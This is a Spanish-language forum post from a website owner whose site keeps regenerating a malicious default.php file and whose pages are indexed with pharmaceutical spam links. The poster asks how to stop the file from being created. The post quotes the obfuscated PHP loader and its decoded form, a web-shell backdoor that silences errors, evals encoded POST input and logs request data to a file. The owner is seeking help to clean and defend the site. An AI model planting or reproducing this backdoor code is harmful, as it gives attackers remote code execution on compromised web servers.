Se ha creado en la raiz de mi web y en cada uno de los directorios un archivo default.php con el siguiente código ofuscado:
Código PHP:
<?php eval(gzinflate(base64_decode("FZRFrsUIggTv0qsqeWEmjXphZsbnzcjMzD79/LlASpkZiv....etc...
Utilizando un decodificador online ( http://www.tareeinternet.com/scripts/decrypt.php) aparece lo siguiente:
Código PHP:
@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;
He pasado un antivirus en mi ordenador, he cambiado las contraseñas en mi FTP y he limpiado todo código malicioso, archivo por archivo, de mi web, sin embargo, al cabo de un par de dias vuelve a crearse el default.php.
Haciendo un site:midominio.com veo que se han indexado gran cantidad de URL's, que se dirigen a productos farmaceuticos...
Os agradecería alguna manera de evitar, de forma definitiva, la creación de archivos no deseado en mi web.
Gracias